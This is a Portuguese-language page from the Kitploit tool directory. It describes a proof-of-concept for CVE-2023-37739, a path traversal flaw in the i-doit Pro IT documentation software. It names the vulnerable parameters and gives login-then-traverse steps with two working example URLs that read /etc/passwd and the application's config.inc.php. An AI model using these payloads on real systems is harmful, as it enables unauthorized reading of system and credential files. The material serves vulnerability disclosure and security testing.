Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below — Prova de conceito de exploit para CVE-2023-37739, uma vulnerabilidade de path traversal no i-doit Pro 25 e versões anteriores que permite que usuários autenticados leiam arquivos sensíveis por meio de parâmetros moduleID e file manipulados. | Kitploit
Ferramentas/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

Prova de conceito de exploit para CVE-2023-37739, uma vulnerabilidade de path traversal no i-doit Pro 25 e versões anteriores que permite que usuários autenticados leiam arquivos sensíveis por meio de parâmetros moduleID e file manipulados.

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-37739 - Path Traversal no i-doit Pro 25 e versões anteriores

O i-doit Pro 25 e versões anteriores são vulneráveis a uma vulnerabilidade de Path Traversal. Essas vulnerabilidades podem permitir que atacantes autenticados remotamente (com privilégios baixos ou altos) naveguem para locais que não deveriam ser acessíveis ao usuário. Pode ser usado para ler e/ou acessar arquivos sensíveis.

Descrição do produto: O i-doit é uma documentação de TI baseada na web e CMDB (Configuration Management Database) desenvolvido pela synetics GmbH. O i-doit Pro é a versão comercial do software e requer uma licença paga. Ele vem com recursos adicionais, suporte profissional e atualizações e melhorias regulares. Os usuários precisam comprar uma licença para usar o i-doit Pro, e o custo varia de acordo com o número de usuários e recursos necessários.

Descrição da vulnerabilidade: Descobrimos que este aplicativo web permite que qualquer usuário autenticado navegue para locais que não deveriam ser acessíveis ao usuário. Pode ser usado para ler e/ou acessar arquivos sensíveis...

Página web afetada: /?moduleID e /index.php

Parâmetro e Componente Afetados 1: ?moduleID=2&file_manager=image&file

Parâmetro e Componente Afetados 2: ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

Passo 1: faça login como qualquer usuário válido, pode ser um usuário de privilégio baixo ou alto. Navegue até a URL abaixo, altere o ../../../ para o arquivo que deseja ler ou acessar.

step1

exemplo 1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

exemplo 2: http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

Baixar ferramenta